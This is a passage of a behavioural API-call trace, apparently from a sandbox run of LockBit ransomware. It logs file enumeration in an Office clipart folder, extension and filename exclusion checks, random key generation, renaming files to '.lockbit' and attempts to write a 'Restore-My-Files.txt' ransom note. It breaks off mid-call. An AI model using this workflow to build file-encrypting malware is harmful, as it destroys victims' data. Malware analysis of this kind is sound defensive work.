[0174.810] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.810] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00177_.WMF") returned -1 [0174.811] lstrcmpiW (lpString1="ntldr", lpString2="SO00177_.WMF") returned -1 [0174.811] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00177_.WMF") returned -1 [0174.811] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00177_.WMF") returned -1 [0174.811] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00177_.WMF") returned -1 [0174.811] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00177_.WMF") returned 1 [0174.811] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00177_.WMF") returned -1 [0174.811] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.811] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00177_.WMF") returned=".WMF" [0174.811] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.811] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.811] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.812] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.812] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00177_.WMF.lockbit") returned 72 [0174.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00177_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0174.815] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.815] malloc (_Size=0x40068) returned 0x1ff1e60 [0174.815] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=36622) returned 1 [0174.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0174.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0174.816] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00177_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00177_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.818] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.818] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.819] free (_Block=0x1fa2ed8) [0174.819] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00177_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.819] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.819] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x283c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00183_.WMF", cAlternateFileName="")) returned 1 [0174.819] lstrcmpiW (lpString1=".", lpString2="SO00183_.WMF") returned -1 [0174.820] lstrcmpiW (lpString1="..", lpString2="SO00183_.WMF") returned -1 [0174.820] PathFindExtensionW (pszPath="SO00183_.WMF") returned=".WMF" [0174.820] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.820] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.821] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.821] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00183_.WMF") returned -1 [0174.822] lstrcmpiW (lpString1="ntldr", lpString2="SO00183_.WMF") returned -1 [0174.822] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00183_.WMF") returned -1 [0174.822] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00183_.WMF") returned -1 [0174.822] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00183_.WMF") returned -1 [0174.822] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00183_.WMF") returned 1 [0174.822] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00183_.WMF") returned -1 [0174.822] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.822] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00183_.WMF") returned=".WMF" [0174.822] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.822] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.822] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.823] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.823] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00183_.WMF.lockbit") returned 72 [0174.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00183_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0174.824] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.825] malloc (_Size=0x40068) returned 0x3d70450 [0174.825] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10300) returned 1 [0174.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0174.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.826] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0174.826] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0174.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00183_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00183_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.831] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.831] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.833] free (_Block=0x1fa2ed8) [0174.833] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00183_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.833] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.833] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.833] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a0ad00, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22a0ad00, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x514c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00190_.WMF", cAlternateFileName="")) returned 1 [0174.833] lstrcmpiW (lpString1=".", lpString2="SO00190_.WMF") returned -1 [0174.833] lstrcmpiW (lpString1="..", lpString2="SO00190_.WMF") returned -1 [0174.833] PathFindExtensionW (pszPath="SO00190_.WMF") returned=".WMF" [0174.833] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.833] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.833] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.833] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.834] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.835] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.835] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00190_.WMF") returned -1 [0174.836] lstrcmpiW (lpString1="ntldr", lpString2="SO00190_.WMF") returned -1 [0174.836] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00190_.WMF") returned -1 [0174.836] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00190_.WMF") returned -1 [0174.836] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00190_.WMF") returned -1 [0174.836] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00190_.WMF") returned 1 [0174.836] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00190_.WMF") returned -1 [0174.836] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.836] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00190_.WMF") returned=".WMF" [0174.836] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.836] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.837] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.837] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.838] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.838] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00190_.WMF.lockbit") returned 72 [0174.838] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00190_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00190_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0174.839] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.840] malloc (_Size=0x40068) returned 0x3e70008 [0174.840] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=20812) returned 1 [0174.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.840] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0174.840] 